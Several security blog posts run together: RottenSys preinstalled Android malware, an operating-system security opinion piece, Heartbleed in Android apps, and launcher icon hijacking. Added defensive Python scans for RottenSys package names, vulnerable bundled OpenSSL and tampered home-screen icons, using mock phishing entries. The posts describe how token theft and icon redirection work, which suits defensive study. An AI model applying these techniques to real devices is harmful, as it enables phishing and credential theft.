Long story short – it’s important to still take precautionary steps to avoid future infection from this type of malware scheme. The good news is, you can easily check if your device is infected with RottenSys. Go to Android system settings → App Manager, and then look for the following possible malware package names:

  • android.yellowcalendarz
  • changmi.launcher
  • system.service.zdsgt
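The same check can be run against a captured package list rather than by scrolling through the App Manager, which also records whether a matching package lives on a vendor partition (preinstalled by the seller) or under the user-installed path. The following is an added example written for this page, not McAfee code; it parses the output format of `pm list packages -f` (`package:<apk path>=<package name>`) and of plain `pm list packages`, and the sample output it runs over is constructed, not from a real device. The three indicator names are the ones listed in the post; the prefix-matching rule (a name equal to, or a sub-package of, an indicator) is an assumption, since the post calls them "possible" package names:

```python
"""Offline audit of a device package list for the RottenSys package names listed above."""
import re

# Package names given in the post, matched exactly or as a package-name prefix (assumption).
ROTTENSYS_PACKAGE_INDICATORS = ("android.yellowcalendarz", "changmi.launcher", "system.service.zdsgt")

# APK paths on these partitions are preinstalled by the vendor rather than by the user.
PREINSTALL_PREFIXES = ("/system/", "/vendor/", "/oem/", "/product/")

# Matches "package:com.foo" and "package:/system/app/Foo.apk=com.foo" (pm list packages -f).
_LINE_RE = re.compile(r"^package:(?:(?P<path>[^=]+)=)?(?P<name>[A-Za-z0-9_.]+)\s*$")


def parse_pm_list(text):
    """Return a list of (package_name, apk_path_or_None) from `pm list packages [-f]` output."""
    entries = []
    for line in text.splitlines():
        match = _LINE_RE.match(line.strip())
        if match:
            entries.append((match.group("name"), match.group("path")))
    return entries


def matches_indicator(name, indicators=ROTTENSYS_PACKAGE_INDICATORS):
    """True when the package name equals an indicator or is a sub-package of one."""
    return any(name == ind or name.startswith(ind + ".") for ind in indicators)


def find_suspect_packages(text, indicators=ROTTENSYS_PACKAGE_INDICATORS):
    """Return one dict per installed package that matches an indicator, flagging whether
    it sits on a vendor partition (preinstalled) or was installed after purchase."""
    hits = []
    for name, path in parse_pm_list(text):
        if matches_indicator(name, indicators):
            hits.append({
                "package": name,
                "path": path,
                "preinstalled": bool(path and path.startswith(PREINSTALL_PREFIXES)),
            })
    return hits


# Constructed sample output (not captured from a real device), in `pm list packages -f` format.
SAMPLE_PM_OUTPUT = """\
package:/system/priv-app/Settings/Settings.apk=com.android.settings
package:/system/app/Calendar/Calendar.apk=android.yellowcalendarz
package:/data/app/com.example.notes-1/base.apk=com.example.notes
package:/data/app/changmi.launcher-2/base.apk=changmi.launcher
package:/data/app/com.example.photos-1/base.apk=com.example.photos
"""

if __name__ == "__main__":
    for hit in find_suspect_packages(SAMPLE_PM_OUTPUT):
        print(hit)
```

A hit on a vendor partition is the case the post describes (the seller shipped the package), and it cannot be removed with a plain uninstall, which is why the advice below to factory-reset and return the device matters; a hit under `/data/app/` was installed later and can be uninstalled like any other app. An absent indicator is not a clean bill of health, since the post lists only the names known at the time.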

Beyond that, you can protect your device by following these tips:

  • Buy with security in mind. When looking to purchase your next mobile device, make sure to do a factory reset as soon as you turn it on for the first time.
  • Delete any unnecessary apps. Most mobile providers allow users to delete pre-installed apps. So, if there’s a pre-installed app you don’t use, or seems unknown to you, go ahead and remove it from your device entirely.
  • Always scan your device, even if it’s new. One of the first applications you should load onto a new device is an anti-malware scanner, like McAfee Mobile Security. It can detect and alert users to malicious behavior on their devices. In this case, if a malware variant is detected, new users can see if they can return their infected devices in exchange for a clean one.


The post RottenSys Malware Reminds Users to Think Twice Before Buying a Bargain Phone appeared first on McAfee Blogs.

Which operating system is the most secure? Four points to remember.

No, you are almost certainly wrong if you tried to guess. A recent study shows that products from Apple actually are at the top when counting vulnerabilities, and that means at the bottom security-wise. Just counting vulnerabilities is not a very scientific way to measure security, and there is a debate over how to interpret the figures. But this is nevertheless a welcome eye-opener that helps kill old myths.

For a long time Apple stubbornly denied security problems, and their marketing succeeded in building an image of security. Meanwhile Windows was the biggest and most malware-targeted system. Microsoft rolled up its sleeves and fought at the front line against viruses and vulnerabilities. Their reputation suffered, but Microsoft gradually improved in security and built an efficient process for patching security holes. Microsoft had what is most important in security, the right attitude. Apple didn’t, and the recent vulnerability study shows the result.

Here are four points for people who want to select a secure operating system.

  • Forget reputation when thinking security. Windows used to be bad and nobody really cared to attack Apple’s computers before they became popular. The old belief that Windows is unsafe and Apple is safe is just a myth nowadays.
  • There is malware on almost all commonly used platforms. Windows Phone is the only exception with practically zero risk. Windows and Android are the most common systems and malware authors are targeting them most. So the need for an anti-malware product is naturally bigger on these systems. But the so-called antivirus products of today are actually broad security suites. They protect against spam and harmful web sites too, just to mention some examples. So chances are that you want a security product anyway, even if your system isn’t one of the main malware targets.
  • So which system is most secure? It’s the one that is patched regularly. All the major systems, Windows, OS X and Linux, have sufficient security for a normal private user. But they will all become unsafe if the security updates are neglected. So security is not really a selection criterion for ordinary people.
  • Mobile devices, phones and tablets, generally have a more modern system architecture and a safer software distribution process. Do you have to use a desktop or laptop, or can you switch to a tablet? Dumping the big old-school devices is a way to improve security. Could it work for you?

So all this really boils down to the fact that you can select any operating system you like and still be reasonably safe. There are some differences, though, but they are more about old-school versus new-school devices, not about Apple versus Microsoft versus Linux. Also remember that your own behavior affects security more than your choice of device, and that you are never 100% safe no matter what you do.


Safe surfing,


Added February 27th. Yes, this controversial study has indeed stirred a heated debate, which isn’t surprising at all. Here’s an article defending Apple. It has flaws and represents a very limited view on security, but one of its important points still stands. If someone still thinks Apple is immortal and invincible, it’s time to wake up. And naturally this whole debate is totally meaningless for ordinary users. Just keep patching what you have and you will be fine. 🙂 Thanks to Jussi (and others) for feedback.


If an Android Has a Heart, Does It Bleed?

The OpenSSL Heartbleed vulnerability “allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read” [1]. Heartbleed surprised the public by allowing attackers to steal sensitive information from vulnerable websites by sending crafted SSL heartbeat messages. However, due to the fact that servers can send heartbeats to clients as well, malicious servers can, in turn, attack vulnerable clients and steal sensitive information. For the Android platform, we find that roughly 150M downloads of Android apps contain OpenSSL libraries vulnerable to Heartbleed.

Currently there are about 17 antivirus apps on Google Play branded as “Heartbleed detectors”. Six of them scan the OpenSSL library belonging to the Android platform for vulnerabilities. Unfortunately, this method isn’t sufficient for detecting the Heartbleed vulnerability on Android. Except in limited Android versions (mainly 4.1.0-4.1.1), the majority of Android platforms are not vulnerable, as most versions use OpenSSL libraries that are not vulnerable or simply have the OpenSSL heartbeat functionality disabled.

However, Android apps frequently use native libraries, which either directly or indirectly leverage vulnerable OpenSSL libraries. Therefore, even though the Android platform itself is not vulnerable, attackers can still attack those vulnerable apps. They can hijack the network traffic, redirect the app to a malicious server and then send crafted heartbeat messages to the app to steal sensitive memory contents.

We studied apps with vulnerable OpenSSL libraries and confirmed this attack. Most of the vulnerable apps are games, and some are office-based applications. Although there is not much valuable information in the game apps, attackers can steal OAuth tokens (access tokens and refresh tokens) to hijack the game accounts; as such, the information might be useful for hijacking those linked social network accounts with incorrect configurations. Office apps vulnerable to Heartbleed are much more dangerous due to further potential data leakage.

During our investigation of the office apps that contains a vulnerable version of OpenSSL, we were surprised that they were not vulnerable to the Heartbleed attack. How could it be? A deeper look shows that these apps either make a mistake in the native code linkage, or just contain dead code. Therefore, when they try to invoke SSL functions, they directly use the non-vulnerable OpenSSL library contained within the Android OS, instead of using the vulnerable library provided by the app. The linkage mistake is common for Android applications built with native code. As such, the side-effect of this mistake helps reduce the apps’ overall risk profile.

Of the 17 Heartbleed detector apps on Google Play, only 6 check the apps installed on the device for the Heartbleed vulnerability. Of those 6, 2 report every installed app as "Safe," including the ones we confirmed as vulnerable. One shows no app scan results at all, and another does not determine the OpenSSL version correctly. Only 2 perform a reasonable check of apps for Heartbleed. Although they conservatively label some non-vulnerable apps as vulnerable, we consider that a defensible report, since it surfaces both the vulnerable libraries and the linkage mistakes. We also found several fake Heartbleed detectors among the 17 apps, which serve only as adware and neither perform real detection nor display results to users.
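A detector that performs the per-app check the better two of those tools attempt, written as an added example for this page and not code from FireEye or from any of the detector apps: it opens an APK, scans every bundled native library for the OpenSSL version banner, treats versions 1.0.1 through 1.0.1f and 1.0.2-beta1 as affected by CVE-2014-0160, and only calls a library vulnerable when the heartbeat handler symbol is also present (it is absent when OpenSSL is built with OPENSSL_NO_HEARTBEATS). It additionally flags bundled libraries named libssl.so or libcrypto.so, because on Android 4.x a DT_NEEDED entry carrying the platform's own soname is satisfied by the system copy already loaded in the process, which is one way the linkage mistake described above arises. That name check is a heuristic, and the sample APK is constructed in the block, not a real app.

```python
import io
import re
import zipfile

# Version banner OpenSSL compiles into libcrypto and libssl (crypto/cversion.c, ssl/ssl_lib.c).
VERSION_RE = re.compile(rb"OpenSSL (\d+\.\d+\.\d+[a-z]?(?:-beta\d+)?)")
# Exported names of the heartbeat handlers; not present when built with OPENSSL_NO_HEARTBEATS.
HEARTBEAT_SYMBOLS = (b"tls1_process_heartbeat", b"dtls1_process_heartbeat")
# Sonames of the platform's own OpenSSL copies on Android 4.x.
SYSTEM_SONAMES = {"libssl.so", "libcrypto.so"}


def version_is_vulnerable(ver):
    """CVE-2014-0160 affects OpenSSL 1.0.1 through 1.0.1f and 1.0.2-beta1."""
    if ver == "1.0.2-beta1":
        return True
    m = re.fullmatch(r"1\.0\.1([a-z]?)", ver)
    return bool(m) and m.group(1) <= "f"


def analyse_native_lib(path, data):
    """Classify one bundled .so from its strings alone (no ELF parsing needed for this)."""
    versions = sorted({v.decode() for v in VERSION_RE.findall(data)})
    heartbeat = any(sym in data for sym in HEARTBEAT_SYMBOLS)
    vulnerable_versions = [v for v in versions if version_is_vulnerable(v)]
    if not versions:
        verdict = "no_openssl"
    elif not vulnerable_versions:
        verdict = "not_vulnerable"
    elif heartbeat:
        verdict = "vulnerable"
    else:
        # Vulnerable banner but no heartbeat handler: either compiled out, or this is the
        # libcrypto half of a split build, so check the matching libssl before closing it.
        verdict = "heartbeat_absent"
    return {
        "lib": path,
        "openssl_versions": versions,
        "verdict": verdict,
        # Heuristic: a bundled copy carrying the platform soname may never be used, because
        # the Android 4.x linker satisfies DT_NEEDED "libssl.so" with the already-loaded
        # system library. That is the linkage mistake that spared some office apps.
        "soname_collides_with_system": path.rsplit("/", 1)[-1] in SYSTEM_SONAMES,
    }


def scan_apk(apk_bytes):
    """Scan every native library packaged under lib/<abi>/ in an APK (an APK is a zip file)."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return [analyse_native_lib(i.filename, zf.read(i)) for i in zf.infolist()
                if i.filename.startswith("lib/") and i.filename.endswith(".so")]


def build_sample_apk():
    """Constructed stand-in for an APK: zip entries holding only the strings the scanner
    keys on, not real ELF files or a real application."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("lib/armeabi/libssl.so", b"OpenSSL 1.0.1e 11 Feb 2013\0tls1_process_heartbeat\0")
        zf.writestr("lib/armeabi/libcrypto.so", b"OpenSSL 1.0.1e 11 Feb 2013\0")
        zf.writestr("lib/armeabi/libgame_tls.so", b"OpenSSL 1.0.1g 7 Apr 2014\0tls1_process_heartbeat\0")
        zf.writestr("lib/armeabi/libphysics.so", b"no crypto here\0")
        zf.writestr("classes.dex", b"dex\n035\0")
    return buf.getvalue()


if __name__ == "__main__":
    for result in scan_apk(build_sample_apk()):
        print(result)
```

Run against real APKs, the string scan also catches OpenSSL statically linked into a larger engine library, which is where most vulnerable games carried it. Whether a bundled copy is actually reached at runtime still needs a dynamic check (for instance, an interception proxy that sends a heartbeat to the app's connection), since the static result cannot tell a live library from dead code.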

On April 10th, we scanned more than 54K Google Play apps (each with over 100K downloads) and found that at least 220 million downloads were affected by the Heartbleed vulnerability. We have notified some of the app developers and library vendors about the OpenSSL Heartbleed vulnerability found in their products. Fortunately, most app developers and library vendors appear to take Heartbleed seriously, as we have started to see apps updated with proper fixes. The total number of downloads of vulnerable apps had decreased to 150 million by April 17th.

[1] Vulnerability Summary for CVE-2014-0160

Occupy Your Icons Silently on Android

FireEye mobile security researchers have discovered a new Android security issue: a malicious app holding only normal protection level permissions can probe the icons on the Android home screen and modify them to point to phishing websites or to the malicious app itself, without notifying the user. Google has acknowledged this issue and released a patch to its OEM partners.

Normal vs. Dangerous Permissions: A Background

Android Open Source Project (AOSP) classifies Android permissions into several protection levels: “normal”, “dangerous”, “system”, “signature” and “development” [1][2][3].

Dangerous permissions “may be displayed to the user and require confirmation before proceeding, or some other approach may be taken to avoid the user automatically allowing the use of such facilities”. In contrast, normal permissions are granted automatically at installation, “without asking for the user's explicit approval (though the user always has the option to review these permissions before installing)” [1].

On the latest Android 4.4.2 system, if an app requests both dangerous permissions and normal permissions, Android only displays the dangerous permissions, as shown in Figure 1. If an app requests only normal permissions, Android doesn’t display them to the user, as shown in Figure 2.

Figure 1. An Android app asks for one dangerous permission (INTERNET) and some normal permissions (Launcher’s READ_SETTINGS and WRITE_SETTINGS). Android doesn’t notify the user about the normal permissions.

Figure 2. An Android app asks for normal permissions (Launcher’s READ_SETTINGS and WRITE_SETTINGS) only. Android doesn’t show any permission to the user.

Normal Permissions Can Be Dangerous

We have found that certain “normal” permissions have dangerous security impacts. Using these normal permissions, a malicious app can replace legitimate Android home screen icons with fake ones that point to phishing apps or websites.

The ability to manipulate Android home screen icons, when abused, helps an attacker deceive the user. It is no surprise, then, that the permission that allows an app to create icons was reclassified from “normal” to “dangerous” in Android 4.2. Though this is an important security improvement, an attacker can still manipulate home screen icons using two permissions that remain normal: the Launcher's READ_SETTINGS and WRITE_SETTINGS (the permissions shown in Figures 1 and 2). Together they allow an app to query, insert, delete or modify the Launcher's entire configuration, including inserting or modifying icons. Unfortunately, both have been labeled “normal” since Android 1.x.

As a proof-of-concept attack scenario, a malicious app with these two permissions can query, insert and alter the Launcher's icon settings and modify the legitimate icons of security-sensitive apps, such as banking apps, so that they point to a phishing website. We tested and confirmed this attack on a Nexus 7 device running Android 4.4.2. (Note: the test website was taken down quickly and nobody else ever connected to it.) Google Play did not prevent this app from being published, and no warning is shown when a user downloads and installs it. (Note: we removed the app from Google Play quickly and nobody else downloaded it.)
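One way to audit a device for this kind of icon tampering, as an added example and not code from FireEye's proof of concept or from Google's patch: it reads the Launcher's favorites table (the table and column names follow AOSP Launcher2's launcher.db; the rows here are constructed and loaded into an in-memory SQLite database), parses each stored intent, and reports entries whose label belongs to a known app but whose intent launches something else, application icons whose intent opens a web URL, and entries that borrow another package's icon resource. The trusted label-to-package map is a hypothetical stand-in for what PackageManager would report on the device.

```python
import sqlite3
from urllib.parse import urlsplit

# Table layout and item types follow AOSP Launcher2 (LauncherProvider / LauncherSettings.Favorites).
ITEM_TYPE_APPLICATION = 0   # launcher icon for an installed app
ITEM_TYPE_SHORTCUT = 1      # shortcut created via INSTALL_SHORTCUT or the settings provider

FAVORITES_SCHEMA = """
CREATE TABLE favorites (
    _id INTEGER PRIMARY KEY, title TEXT, intent TEXT, container INTEGER,
    screen INTEGER, cellX INTEGER, cellY INTEGER, spanX INTEGER, spanY INTEGER,
    itemType INTEGER, appWidgetId INTEGER NOT NULL DEFAULT -1, isShortcut INTEGER,
    iconType INTEGER, iconPackage TEXT, iconResource TEXT, icon BLOB,
    uri TEXT, displayMode INTEGER)
"""


def parse_intent_uri(uri):
    """Parse the Intent.toUri(0) string form: '<data-uri>#Intent;key=value;...;end'."""
    data, sep, rest = uri.partition("#Intent;")
    fields = {"data": data or None, "categories": []}
    if sep:
        for part in rest.split(";"):
            key, eq, value = part.partition("=")
            if not eq:                      # skips the trailing 'end' token
                continue
            if key == "category":
                fields["categories"].append(value)
            else:
                fields[key] = value
    return fields


def target_package(intent):
    """Package the intent resolves to, taken from its explicit component or package field."""
    comp = intent.get("component") or intent.get("package")
    return comp.split("/", 1)[0] if comp else None


def audit_favorites(conn, trusted_labels):
    """Flag home screen entries whose launch target contradicts what the icon claims.
    trusted_labels maps a launcher label to the package that legitimately owns it."""
    findings = []
    query = "SELECT _id, title, intent, itemType, iconPackage FROM favorites"
    for row_id, title, intent_uri, item_type, icon_pkg in conn.execute(query):
        intent = parse_intent_uri(intent_uri or "")
        pkg = target_package(intent)
        data = intent["data"]
        expected = trusted_labels.get(title)
        if expected and pkg != expected:
            findings.append((row_id, "label %r launches %s, expected %s" % (title, pkg or data, expected)))
        elif item_type == ITEM_TYPE_APPLICATION and data and urlsplit(data).scheme in ("http", "https"):
            findings.append((row_id, "application icon %r opens a URL: %s" % (title, data)))
        elif icon_pkg and pkg and icon_pkg != pkg:
            findings.append((row_id, "icon for %r borrowed from %s but launches %s" % (title, icon_pkg, pkg)))
    return findings


def build_sample_db():
    """Constructed launcher.db contents: a clean app icon, a hijacked app icon,
    a label-spoofing shortcut, and a legitimate browser bookmark."""
    conn = sqlite3.connect(":memory:")
    conn.execute(FAVORITES_SCHEMA)
    main = ("#Intent;action=android.intent.action.MAIN;"
            "category=android.intent.category.LAUNCHER;component=%s;end")
    rows = [
        (1, "Photos", main % "com.example.photos/.MainActivity", ITEM_TYPE_APPLICATION, None),
        # The bank icon's intent was rewritten to a phishing page; title and bitmap untouched.
        (2, "Bank", "https://bank-login.example.net/#Intent;action=android.intent.action.VIEW;end",
         ITEM_TYPE_APPLICATION, None),
        # A shortcut reusing the mail app's label and icon resource but launching another package.
        (3, "Mail", main % "com.attacker.lookalike/.MainActivity", ITEM_TYPE_SHORTCUT, "com.example.mail"),
        # Ordinary browser bookmark: a URL with the browser's icon and no spoofed label.
        (4, "Docs", "https://docs.example.org/#Intent;action=android.intent.action.VIEW;end",
         ITEM_TYPE_SHORTCUT, "com.android.browser"),
    ]
    conn.executemany(
        "INSERT INTO favorites (_id, title, intent, itemType, iconPackage) VALUES (?, ?, ?, ?, ?)", rows)
    return conn


# Hypothetical label map; on a device, build it from PackageManager's launcher activity labels.
TRUSTED_LABELS = {"Bank": "com.example.bank", "Mail": "com.example.mail", "Photos": "com.example.photos"}

if __name__ == "__main__":
    for row_id, message in audit_favorites(build_sample_db(), TRUSTED_LABELS):
        print("favorites._id=%d: %s" % (row_id, message))
```

On a device the same table is what the Launcher's settings provider exposes to any holder of READ_SETTINGS, which is exactly why the permission matters: the audit reads nothing a normal-permission app could not already read, and a WRITE_SETTINGS holder can rewrite every row it lists. Pulling launcher.db over adb from a test device, or dumping the provider with adb shell content query, gives real input for the same functions.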

Lastly, this vulnerability is not limited to devices running the AOSP Launcher. We also examined devices that use non-AOSP Launchers, including a Nexus 7 with CyanogenMod 4.4.2, a Samsung Galaxy S4 with Android 4.3 and an HTC One with Android 4.4.2. All of them set the protection level of READ_SETTINGS and WRITE_SETTINGS to “normal”.

Google acknowledged this vulnerability and has released the patch to its OEM partners. Many Android vendors have been slow to adopt security upgrades. We urge these vendors to patch vulnerabilities more quickly to protect their users.